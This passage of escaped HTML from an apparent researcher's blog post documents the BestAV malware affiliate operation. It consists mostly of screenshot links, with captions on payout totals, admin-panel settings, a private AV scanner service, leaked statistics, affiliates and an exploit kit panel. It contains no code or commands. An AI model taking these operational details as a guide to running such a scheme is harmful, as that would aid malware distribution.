&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiSV8WKB4Hi4mVGrWlVhq6RKtak74Jbu_u5HUaAtLEgFeV92uMISv_SwsTBEiENvlIXlkEbjPVIdJVmebYmcjuNqO53p_1Yo2wU25BMUE8exhpHsn_V2Dh5bK_Bf_SuQHpmmhmTNZ1cII/s1600/12-04-2014+14-14-16.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiSV8WKB4Hi4mVGrWlVhq6RKtak74Jbu_u5HUaAtLEgFeV92uMISv_SwsTBEiENvlIXlkEbjPVIdJVmebYmcjuNqO53p_1Yo2wU25BMUE8exhpHsn_V2Dh5bK_Bf_SuQHpmmhmTNZ1cII/s1600/12-04-2014+14-14-16.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Here are the total payments per software type across all years:&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;soft1:&amp;nbsp;$1,095,100.40 → $1.10M&lt;/li&gt;&lt;li&gt;soft2:&amp;nbsp;$916,701.20 → $916.70K&lt;/li&gt;&lt;li&gt;soft3:&amp;nbsp;$2,671.55 → $2.67K&lt;/li&gt;&lt;/ul&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMthnoIaYabYw7QpfEYRKF3wuFOuq7rAaOSmAA86k1ZbBO3yHry2H-AxaK3KTUntbXlUOBkCs1cDLR2JwCIUwh38PT0OxyVNJZWSTrf4R3aDhNP29RvfLKzs9FM2g_LcY_a1zBP3CprnY/s1600/12-04-2014+14-38-17.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;285&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMthnoIaYabYw7QpfEYRKF3wuFOuq7rAaOSmAA86k1ZbBO3yHry2H-AxaK3KTUntbXlUOBkCs1cDLR2JwCIUwh38PT0OxyVNJZWSTrf4R3aDhNP29RvfLKzs9FM2g_LcY_a1zBP3CprnY/s1600/12-04-2014+14-38-17.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;The most &#39;busy&#39; year is 2013:&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;soft2: $916,701.20 →&amp;nbsp;$916.70K&lt;/li&gt;&lt;li&gt;soft1: $521,472.98 →&amp;nbsp;$521.47K&lt;/li&gt;&lt;li&gt;soft3: $2,671.55&amp;nbsp;→&amp;nbsp;$2.67K&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;A lot of money was distributed among affiliates.&lt;/p&gt;&lt;p&gt;Mass payement for 2014 to do:&lt;br /&gt;
&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr-2I9f7RSox6ipS-Ktu7WKhRCPvy7HXCHS27mdBVfiOUuaqdkk1mEXA9POlDUERPvU66ljzsKzOugm8nOu6d4s6az5fwaADDYJPk3lABDaw7CJQ5HfIBHs7WEkoSuQHt-66SeRGwlo04/s1600/09-04-2014+14-11-58.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;294&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr-2I9f7RSox6ipS-Ktu7WKhRCPvy7HXCHS27mdBVfiOUuaqdkk1mEXA9POlDUERPvU66ljzsKzOugm8nOu6d4s6az5fwaADDYJPk3lABDaw7CJQ5HfIBHs7WEkoSuQHt-66SeRGwlo04/w400-h294/09-04-2014+14-11-58.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit texts:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBDFK2jAt0IlqgNe_1SQZWSGj8nnAEENMl7U9XebTP6oPr8moshQClT4N7ELuvFFtiP8WmonELLhl4WND8h7zVqS6Kfkjce3wWNZwrHdj6kVssKREdJvWx0QRtUJJWr4wu-AwSWcoPGo/s1600/09-04-2014+14-06-56.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBDFK2jAt0IlqgNe_1SQZWSGj8nnAEENMl7U9XebTP6oPr8moshQClT4N7ELuvFFtiP8WmonELLhl4WND8h7zVqS6Kfkjce3wWNZwrHdj6kVssKREdJvWx0QRtUJJWr4wu-AwSWcoPGo/s1600/09-04-2014+14-06-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Home page text edit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifCmS72amOPffa1Z_T5tQI0pK_C9voSZ7txveSR3HwIHTttMC7Aw3IxuNM0L-d7syJizMGLq3gbph4rDlgzfI_fEmckFNQLfsb2kK5vWpUZa5Kgk8jZj7sUotVNpwdf6JMPcmSCoiFM3Q/s1600/09-04-2014+14-07-34.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;223&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifCmS72amOPffa1Z_T5tQI0pK_C9voSZ7txveSR3HwIHTttMC7Aw3IxuNM0L-d7syJizMGLq3gbph4rDlgzfI_fEmckFNQLfsb2kK5vWpUZa5Kgk8jZj7sUotVNpwdf6JMPcmSCoiFM3Q/s1600/09-04-2014+14-07-34.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Private AV scanner config (chk4me.com connection):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKv8dl1XfNorvP6DHfK4EHUErBbvSLfrieu1-J8ARVNJRWIzaGYv_mt-Nf7WYe-pXBpE1XvWEmnlhmyyv0Rt8TRUT3h3NxDqUvQidjrRLkKKOTrepVqb4eTc_ToEBwVTkJFUDXMYTCzo/s1600/09-04-2014+14-08-11.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;155&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKv8dl1XfNorvP6DHfK4EHUErBbvSLfrieu1-J8ARVNJRWIzaGYv_mt-Nf7WYe-pXBpE1XvWEmnlhmyyv0Rt8TRUT3h3NxDqUvQidjrRLkKKOTrepVqb4eTc_ToEBwVTkJFUDXMYTCzo/w400-h155/09-04-2014+14-08-11.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;Allowed IPs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9zj7rJGz7okNtYouyKNI9TQm3cBdXpch_ojM_lR8JBjA2DLVKlKa2LdOhrwlfT7BsxCSZ5VBMvFYJRxPSG0Oi0DIYL5RWDHr-zwPXvNIkA3gDDYQsKSwSYliIfrMDkMge_zLHDCIlG8/s1600/09-04-2014+14-08-59.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;185&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9zj7rJGz7okNtYouyKNI9TQm3cBdXpch_ojM_lR8JBjA2DLVKlKa2LdOhrwlfT7BsxCSZ5VBMvFYJRxPSG0Oi0DIYL5RWDHr-zwPXvNIkA3gDDYQsKSwSYliIfrMDkMge_zLHDCIlG8/w400-h185/09-04-2014+14-08-59.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tickets:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVr5WjTtPaL4zg47rhLKyhgg-iQ8DzeAXqSslvvhZDcsEH7FkVDQVR2JZJ_Zn-4eQrLJakhM1PyF2KHdWYN1z0tc_IaBbP0DweZx2BJiVuQfm2w3GV43jghVZozHU2VhZnQ7AbOGYbj4/s1600/11-04-2014+18-51-29.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;123&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVr5WjTtPaL4zg47rhLKyhgg-iQ8DzeAXqSslvvhZDcsEH7FkVDQVR2JZJ_Zn-4eQrLJakhM1PyF2KHdWYN1z0tc_IaBbP0DweZx2BJiVuQfm2w3GV43jghVZozHU2VhZnQ7AbOGYbj4/s1600/11-04-2014+18-51-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihnzyySCnz09W_96AMW5BF66sEzDesk8rVsokmJmx1lRjx_rf7nDvTB4YAJExyVpX31UJv9Y-fv71Rhm5E2pjtFzClnCRwtCbQ4sS6n87HXU7RNJydwHo-OcNpZTHkE8sIRtntlbLHrWs/s1600/11-04-2014+18-49-00.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;221&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihnzyySCnz09W_96AMW5BF66sEzDesk8rVsokmJmx1lRjx_rf7nDvTB4YAJExyVpX31UJv9Y-fv71Rhm5E2pjtFzClnCRwtCbQ4sS6n87HXU7RNJydwHo-OcNpZTHkE8sIRtntlbLHrWs/s1600/11-04-2014+18-49-00.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&amp;nbsp;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGWwT7BzAYGvhOs3QW4xuFimKKI06jLAtSPV9Jr9f1WMa4kWIbxvwXD7XZLTh0JoSrq1Gk9T_L5PwyfM8NsIflyKrTbph1KoEVlEp9vBGymCkh_q3L2TWrplcwTgIQT_kvHLue7ehw-U/s1600/2014-07-08_14-59-24.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGWwT7BzAYGvhOs3QW4xuFimKKI06jLAtSPV9Jr9f1WMa4kWIbxvwXD7XZLTh0JoSrq1Gk9T_L5PwyfM8NsIflyKrTbph1KoEVlEp9vBGymCkh_q3L2TWrplcwTgIQT_kvHLue7ehw-U/s1600/2014-07-08_14-59-24.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhJDSNEb7HNP9LdJ7mbSD5c7vG6vMWyIo4uSK2IqB_kvxQe86We-w3lwDsSKYQOUYi0_ehYC_PJ0JZanoyEKuNoTy_tY1usGvsEhQtu7jLojGmy6Ns-9lm855Q0rhcz9KvBG7VIxpicuI/s1600/2014-07-08_15-00-24.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;339&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhJDSNEb7HNP9LdJ7mbSD5c7vG6vMWyIo4uSK2IqB_kvxQe86We-w3lwDsSKYQOUYi0_ehYC_PJ0JZanoyEKuNoTy_tY1usGvsEhQtu7jLojGmy6Ns-9lm855Q0rhcz9KvBG7VIxpicuI/w400-h339/2014-07-08_15-00-24.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
BestAV later changed their urls to farotexsoft.com, webalizer was leaking informations:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvgsMco9q_rf8eRAnvPiaUmsY1p729Wn-UDIsUqFSGg42TUbN9PlbwDjRqNVCcqvQQ38LeWBhyx0xfV2knn0nFogG44QZzylhu0prJ0_GtBRUNmsDCN_0TovPJK5st_xHhv_qMba6i8LA/s1600/2014-07-08_00-41-29.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvgsMco9q_rf8eRAnvPiaUmsY1p729Wn-UDIsUqFSGg42TUbN9PlbwDjRqNVCcqvQQ38LeWBhyx0xfV2knn0nFogG44QZzylhu0prJ0_GtBRUNmsDCN_0TovPJK5st_xHhv_qMba6i8LA/s1600/2014-07-08_00-41-29.png&quot; width=&quot;313&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwGaQL2W0gShW_TQR0RKgl2dlww15EBv1D-K2w4bzecJCOwPjijYpLrKXr9x6Gu42MQJ6875x22B16Hbo0ExmHBxip8U8fH4pFu7ky3cH04j9tBEUBaPQdXjoKZoKRXc89-YLHnDLFTUU/s1600/2014-07-08_00-43-03.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwGaQL2W0gShW_TQR0RKgl2dlww15EBv1D-K2w4bzecJCOwPjijYpLrKXr9x6Gu42MQJ6875x22B16Hbo0ExmHBxip8U8fH4pFu7ky3cH04j9tBEUBaPQdXjoKZoKRXc89-YLHnDLFTUU/s1600/2014-07-08_00-43-03.png&quot; width=&quot;307&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JmYMTEO4oD-mKXs-WT9pvC3yiVtCPTauOIiTfrfZAlyA-S8RB3p1t9BFTf48HQPUdxzRNyK_HRCrzfvVwzfXCNdW6Nnil9lHpKogLrFsrs_kCvBM6aXw_FVgHZv1iPUQ389rnRIy7VI/s1600/2014-07-08_00-48-43.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JmYMTEO4oD-mKXs-WT9pvC3yiVtCPTauOIiTfrfZAlyA-S8RB3p1t9BFTf48HQPUdxzRNyK_HRCrzfvVwzfXCNdW6Nnil9lHpKogLrFsrs_kCvBM6aXw_FVgHZv1iPUQ389rnRIy7VI/s1600/2014-07-08_00-48-43.png&quot; width=&quot;307&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Interesting referrers:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRLTi2Fn908x8J_zZM4ccz8JAyzbrlMFkG3RwniGcfGugzmTwvtQEf5oSJhNIXN_FnpxiBIwMVlnTZ2EqLpCPWBDYaK9HAeh4UuKoJl7NfoH8MeXXtI7ds9nfxjSqfjd1VBIzjUa2uMlk/s1600/2014-07-08_00-44-03.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRLTi2Fn908x8J_zZM4ccz8JAyzbrlMFkG3RwniGcfGugzmTwvtQEf5oSJhNIXN_FnpxiBIwMVlnTZ2EqLpCPWBDYaK9HAeh4UuKoJl7NfoH8MeXXtI7ds9nfxjSqfjd1VBIzjUa2uMlk/s1600/2014-07-08_00-44-03.png&quot; width=&quot;307&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixkrNiHjfLeNMhudXkxjseUOui2K9XSmSSDMGg0_hX7S8MQRpQUCCiwUwK7n87cTuYH4bhen4HICBl0ZsTsOnpxFD8q7aa54b3taWpAPtn_ela1wYcWcFITevRPIRLUaMToutSzm8SDQ0/s1600/2014-07-08_00-50-07.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixkrNiHjfLeNMhudXkxjseUOui2K9XSmSSDMGg0_hX7S8MQRpQUCCiwUwK7n87cTuYH4bhen4HICBl0ZsTsOnpxFD8q7aa54b3taWpAPtn_ela1wYcWcFITevRPIRLUaMToutSzm8SDQ0/s1600/2014-07-08_00-50-07.png&quot; width=&quot;307&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Prime affiliate who are in relation with the group behind BestAV:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGtRh-2hJz0ac4mTxvuIBZHR-ux6ea009uWVYMBndGNp6AhKzIRp160_ocAzNy6cqId-019oILDVfHE8UMvwJ-tNSI2_njvH2sJTxfP4vRMY0jFtE6A4dkO_KlHafQNT-k_sG7N-f46Y/s1600/2014-07-08_01-10-57.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGtRh-2hJz0ac4mTxvuIBZHR-ux6ea009uWVYMBndGNp6AhKzIRp160_ocAzNy6cqId-019oILDVfHE8UMvwJ-tNSI2_njvH2sJTxfP4vRMY0jFtE6A4dkO_KlHafQNT-k_sG7N-f46Y/s1600/2014-07-08_01-10-57.png&quot; width=&quot;355&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXaxaNc_Uy4Njchls2RyyI-M4z3zQbK791U_r28xxMkDjRtvnpaDlgRQTFdYRJDvIlKjiC-ZP3vbk23G-D4X2nhg3tDiK6HpzrowPYbCcBcberdSWXAQ5C2_IvCpQhLPAJviE-r1Jg-M/s1600/2014-07-08_01-21-58.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;293&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXaxaNc_Uy4Njchls2RyyI-M4z3zQbK791U_r28xxMkDjRtvnpaDlgRQTFdYRJDvIlKjiC-ZP3vbk23G-D4X2nhg3tDiK6HpzrowPYbCcBcberdSWXAQ5C2_IvCpQhLPAJviE-r1Jg-M/s1600/2014-07-08_01-21-58.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
BestAV old affiliate Exploit kit:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-QvG31oowyVlz86y_Diawt813crfbk4fXZBucCdOCelFbjFs8QkHWPtijM71sPnK0jUhNs8v0ZcubE3iWxuxOPW0JxI3V52zuoKEGNzN22-RjkbAuJHk0Ts7h6QRmSJmZd5HbuVYNcTs/s1600/IGNCHX1sbhM6el45D0HcPcuM1a0k1Hf8uccCBsKfGm2cD.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-QvG31oowyVlz86y_Diawt813crfbk4fXZBucCdOCelFbjFs8QkHWPtijM71sPnK0jUhNs8v0ZcubE3iWxuxOPW0JxI3V52zuoKEGNzN22-RjkbAuJHk0Ts7h6QRmSJmZd5HbuVYNcTs/s400/IGNCHX1sbhM6el45D0HcPcuM1a0k1Hf8uccCBsKfGm2cD.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbUH1MUlQYdRVuTmCsB2pRIudYQ08n1eXQU8Y6mRKFGiMZwdF_Nc12FXv6ZPyhKwKLzZYCD3gsA1L4L8Zz_iRoOWewIdKPcNOqozJrUejlaLXbtShkUAUa4RM2YQWffJhozVJCHIBXcQ/s1600/1XPeZxCDILVEmHK7daHZm2v3ZzM0x2Spvxy0XG8Uf.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbUH1MUlQYdRVuTmCsB2pRIudYQ08n1eXQU8Y6mRKFGiMZwdF_Nc12FXv6ZPyhKwKLzZYCD3gsA1L4L8Zz_iRoOWewIdKPcNOqozJrUejlaLXbtShkUAUa4RM2YQWffJhozVJCHIBXcQ/s400/1XPeZxCDILVEmHK7daHZm2v3ZzM0x2Spvxy0XG8Uf.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQI3UWb_RufZdckQhVOSEhhpdOiqZVio8tHXyl_KWFnvxD_Yf2fm9znNdZHZcxESViHpB6TemYlrf87LP4TvCSN-N_KCCrAi4l3kGgBYvHDe1PlqqlIH5j2wpNJitVCEEGyHTN7C0F3Ek/s1600/04-08-2013+16-11-03.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQI3UWb_RufZdckQhVOSEhhpdOiqZVio8tHXyl_KWFnvxD_Yf2fm9znNdZHZcxESViHpB6TemYlrf87LP4TvCSN-N_KCCrAi4l3kGgBYvHDe1PlqqlIH5j2wpNJitVCEEGyHTN7C0F3Ek/s400/04-08-2013+16-11-03.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBl1eFteAOM1WKcoJXAKkuenRIWHXp8PELKdKHT_BQDBUDrc3fu-9gZqUcjdACaZVNb_iP4wf9-J7lcPc5bxTPlzpL6mNQrprLk9rZbzVWcF3sKO2WFDKPV3Mo-rHaIv4G2QD0PMiH9UQ/s1600/fiMlBYDxJSasiDsXSgoGhv7aP0B36c3mmUdEFMX.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBl1eFteAOM1WKcoJXAKkuenRIWHXp8PELKdKHT_BQDBUDrc3fu-9gZqUcjdACaZVNb_iP4wf9-J7lcPc5bxTPlzpL6mNQrprLk9rZbzVWcF3sKO2WFDKPV3Mo-rHaIv4G2QD0PMiH9UQ/s400/fiMlBYDxJSasiDsXSgoGhv7aP0B36c3mmUdEFMX.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh7yH0CCXT3bN3QxJQ7tOKZMr3BjtPk5NfxjsXpfQqLxS_UyHCsUmp5sSuXMWt31ZS-b7uhjnYcZSvwfqpXG8mA-vtlSM-1M-F9456GZEvPq6WngXF4ljEFqp821FXsMoFB-MYWpjEfWY/s1600/G7TabxhycRsgHHl6CY6K0ar21VVm.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh7yH0CCXT3bN3QxJQ7tOKZMr3BjtPk5NfxjsXpfQqLxS_UyHCsUmp5sSuXMWt31ZS-b7uhjnYcZSvwfqpXG8mA-vtlSM-1M-F9456GZEvPq6WngXF4ljEFqp821FXsMoFB-MYWpjEfWY/s400/G7TabxhycRsgHHl6CY6K0ar21VVm.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAGZ7ORAZFSZ6BD-rwoRUzI-i7sa8-FlcOz4F2M-qBOSMKWMjk7uGhOwGn7KayRDFtLHjbNHhMVOw6QoA-gSDdXhwCekd7hGHGxEWO3wSmu6O1JYqWiHVsEAOPEGikcHD-Bw5mC95o3M/s1600/Na2pOYmLVA4FXo1XBOYPdZKaxpP2SXEAyPju.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAGZ7ORAZFSZ6BD-rwoRUzI-i7sa8-FlcOz4F2M-qBOSMKWMjk7uGhOwGn7KayRDFtLHjbNHhMVOw6QoA-gSDdXhwCekd7hGHGxEWO3wSmu6O1JYqWiHVsEAOPEGikcHD-Bw5mC95o3M/s400/Na2pOYmLVA4FXo1XBOYPdZKaxpP2SXEAyPju.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftlMtgmLYEPePXQhr1Vif66kVdRTtiB_t7Ko5J29aWLxm_pzoFmr2nDtzec0bwWaa6oduCR9NEJBQsXPP3w9zcVxYcl6BPauESixVh6s_F2hmrFP44o4fWWCvJxT_q_rjIdbMUh8WOG4/s1600/04-08-2013+16-15-55.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftlMtgmLYEPePXQhr1Vif66kVdRTtiB_t7Ko5J29aWLxm_pzoFmr2nDtzec0bwWaa6oduCR9NEJBQsXPP3w9zcVxYcl6BPauESixVh6s_F2hmrFP44o4fWWCvJxT_q_rjIdbMUh8WOG4/s400/04-08-2013+16-15-55.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
